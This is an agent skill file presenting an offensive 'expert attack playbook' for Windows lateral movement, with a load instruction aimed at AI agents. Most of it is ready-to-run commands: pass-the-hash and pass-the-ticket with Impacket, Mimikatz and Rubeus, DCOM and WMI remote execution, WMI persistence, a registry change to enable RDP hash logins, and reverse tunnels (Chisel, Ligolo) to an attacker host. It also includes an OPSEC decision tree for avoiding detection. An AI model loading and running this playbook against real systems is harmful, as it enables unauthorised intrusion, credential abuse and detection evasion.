windows-lateral-movement
Installation
SKILL.md
SKILL: Windows Lateral Movement — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert Windows lateral movement techniques. Covers PsExec, WMI, WinRM, DCOM, SMB, RDP, SSH, pass-the-hash, overpass-the-hash, pass-the-ticket, and pivoting. Base models miss execution method fingerprints, OPSEC trade-offs, and credential type requirements per method.
0. RELATED ROUTING
Before going deep, consider loading:
- windows-privilege-escalation after landing on a new host for local escalation
- windows-av-evasion when EDR blocks lateral movement tools
- active-directory-kerberos-attacks for Kerberos-based lateral (pass-the-ticket, delegation)
- active-directory-acl-abuse for ACL-based paths to new hosts
Advanced Reference
Also load CREDENTIAL_DUMPING.md when you need:
- LSASS dump techniques (MiniDump, comsvcs.dll, nanodump)
- SAM/SYSTEM/SECURITY extraction
- DPAPI, credential manager, cached domain credentials
- NTDS.dit extraction methods
1. REMOTE EXECUTION METHODS COMPARISON
| Method | Port | Cred Type | Creates Service? | File on Disk? | OPSEC | Admin Required? |
|---|---|---|---|---|---|---|
| PsExec | 445 (SMB) | Password/Hash | Yes (PSEXESVC) | Yes (.exe) | Low | Yes |
| Impacket smbexec | 445 | Password/Hash | Yes (temp service) | No | Medium | Yes |
| Impacket atexec | 445 | Password/Hash | No (scheduled task) | No | Medium | Yes |
| WMI | 135+dynamic | Password/Hash | No | No | High | Yes |
| WinRM | 5985/5986 | Password/Hash/Ticket | No | No | High | Yes (Remote Mgmt) |
| DCOM | 135+dynamic | Password/Hash | No | No | High | Yes |
| RDP | 3389 | Password/Hash (RestrictedAdmin) | No | No | Low (GUI session) | RDP access |
| SSH | 22 | Password/Key | No | No | High | SSH enabled |
| SC | 445 | Password/Hash | Yes (custom service) | Yes | Low | Yes |
2. PSEXEC VARIANTS
Impacket PsExec
# With password
psexec.py DOMAIN/administrator:password@TARGET_IP
# With NTLM hash (pass-the-hash)
psexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
# With Kerberos ticket
export KRB5CCNAME=admin.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.com
Impacket smbexec (Stealthier — No Binary Upload)
smbexec.py DOMAIN/administrator:password@TARGET_IP
smbexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
Impacket atexec (Scheduled Task)
atexec.py DOMAIN/administrator:password@TARGET_IP "whoami"
atexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP "whoami"
Sysinternals PsExec
PsExec64.exe \\TARGET -u DOMAIN\administrator -p password cmd.exe
PsExec64.exe \\TARGET -s cmd.exe & REM Run as SYSTEM (-s)
PsExec64.exe \\TARGET -accepteula -s -d cmd.exe /c "C:\temp\payload.exe"
3. WMI LATERAL MOVEMENT
# Impacket wmiexec
wmiexec.py DOMAIN/administrator:password@TARGET_IP
wmiexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
# With Kerberos
export KRB5CCNAME=admin.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@target.domain.com
# PowerShell WMI process creation
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred
# WMI event subscription persistence
$filterArgs = @{
EventNamespace = 'root\cimv2'; Name = 'Updater';
QueryLanguage = 'WQL';
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs
4. WINRM LATERAL MOVEMENT
# evil-winrm (from Linux — with password)
evil-winrm -i TARGET_IP -u administrator -p password
# evil-winrm (with hash)
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH
# evil-winrm (with Kerberos)
evil-winrm -i target.domain.com -r DOMAIN.COM
# PowerShell remoting
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred
# Execute command remotely
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }
# Multiple targets simultaneously
Invoke-Command -ComputerName TARGET1,TARGET2 -Credential $cred -ScriptBlock { hostname; whoami }
5. DCOM LATERAL MOVEMENT
Stealthy — uses legitimate COM objects, no service creation.
MMC20.Application
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\temp\out.txt","7")
ShellWindows
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\temp\out.txt","C:\Windows\System32",$null,0)
ShellBrowserWindow
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET"))
$com.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)
Impacket dcomexec
dcomexec.py DOMAIN/administrator:password@TARGET_IP
dcomexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP -object MMC20
6. PASS-THE-HASH (PTH)
Use NTLM hash directly without knowing the plaintext password.
# CrackMapExec — spray/check admin access
crackmapexec smb TARGETS -u administrator -H NTLM_HASH
# Impacket tools (all support -hashes)
psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
# evil-winrm
evil-winrm -i TARGET -u user -H NTLM_HASH
# xfreerdp (Restricted Admin mode must be enabled)
xfreerdp /v:TARGET /u:administrator /pth:NTLM_HASH /d:DOMAIN
# Mimikatz PTH (spawns new process with injected creds)
sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:HASH /run:cmd.exe
Enable Restricted Admin for RDP PTH
# On target (requires admin): enable restricted admin
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
7. OVERPASS-THE-HASH (PASS-THE-KEY)
Convert NTLM hash → Kerberos TGT → pure Kerberos authentication.
# Request TGT with hash
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
# Or with AES256 key
getTGT.py DOMAIN/user -aesKey AES256_KEY -dc-ip DC_IP
# Use Kerberos for all subsequent tools
psexec.py -k -no-pass DOMAIN/user@target.domain.com
wmiexec.py -k -no-pass DOMAIN/user@target.domain.com
# Mimikatz overpass-the-hash
sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe
# New PowerShell session → klist shows Kerberos TGT
Advantage: Pure Kerberos auth avoids NTLM logging and detection.
8. PASS-THE-TICKET
# Use existing .ccache ticket
export KRB5CCNAME=/path/to/admin.ccache
psexec.py -k -no-pass DOMAIN/admin@target.domain.com
# Mimikatz — inject .kirbi ticket
kerberos::ptt ticket.kirbi
# Verify
klist
# Rubeus
Rubeus.exe ptt /ticket:base64_blob
9. PIVOTING THROUGH COMPROMISED HOSTS
SSH Tunnel / Port Forward
# Dynamic SOCKS proxy through compromised host
ssh -D 1080 user@COMPROMISED_HOST
# Use with proxychains
# Local port forward (access internal service)
ssh -L 8888:INTERNAL_TARGET:445 user@COMPROMISED_HOST
Chisel (No SSH Needed)
# On attacker (server)
chisel server --reverse -p 8080
# On compromised host (client)
chisel client ATTACKER:8080 R:socks
# Creates SOCKS5 proxy on attacker's port 1080
Ligolo-ng (Modern, Fast)
# On attacker
ligolo-proxy -selfcert -laddr 0.0.0.0:11601
# On compromised host
ligolo-agent -connect ATTACKER:11601 -retry -ignore-cert
# In ligolo console
session # Select agent
start # Start tunnel
# Add route: sudo ip route add INTERNAL_SUBNET/24 dev ligolo
10. LATERAL MOVEMENT DECISION TREE
Have credentials / hash — need to move laterally
│
├── What credentials do you have?
│ ├── Plaintext password → any method
│ ├── NTLM hash → PTH methods (§6)
│ │ ├── Need stealthier? → Overpass-the-Hash first (§7)
│ │ └── Direct use → psexec/wmiexec/evil-winrm with -H
│ ├── Kerberos ticket → Pass-the-Ticket (§8)
│ └── AES key → Overpass-the-Hash with -aesKey (§7)
│
├── OPSEC priority?
│ ├── High stealth needed
│ │ ├── WMI (no file on disk, no service) → wmiexec (§3)
│ │ ├── DCOM (uses legitimate COM) → dcomexec (§5)
│ │ └── WinRM (PowerShell remoting) → evil-winrm (§4)
│ ├── Moderate stealth
│ │ ├── smbexec (no binary upload) (§2)
│ │ └── atexec (scheduled task, auto-cleanup) (§2)
│ └── Low stealth acceptable
│ ├── PsExec (reliable, creates service) (§2)
│ └── RDP (interactive GUI) (§6)
│
├── Need to pivot to internal network?
│ ├── SSH available → SSH tunnel / SOCKS (§9)
│ ├── No SSH → Chisel or Ligolo-ng (§9)
│ └── Multiple hops → chain SOCKS proxies
│
├── Target hardening?
│ ├── SMB signing required → WMI, WinRM, or DCOM
│ ├── WinRM disabled → WMI or DCOM
│ ├── Firewall blocks 135/445 → RDP or SSH
│ └── Restricted Admin disabled → no RDP PTH → use other methods
│
└── Need to dump creds on new host?
└── Load CREDENTIAL_DUMPING.md
Weekly Installs
20
Repository
yaklang/hack-skillsGitHub Stars
69
First Seen
1 day ago
Security Audits
Installed on
opencode20
gemini-cli20
deepagents20
antigravity20
github-copilot20
codex20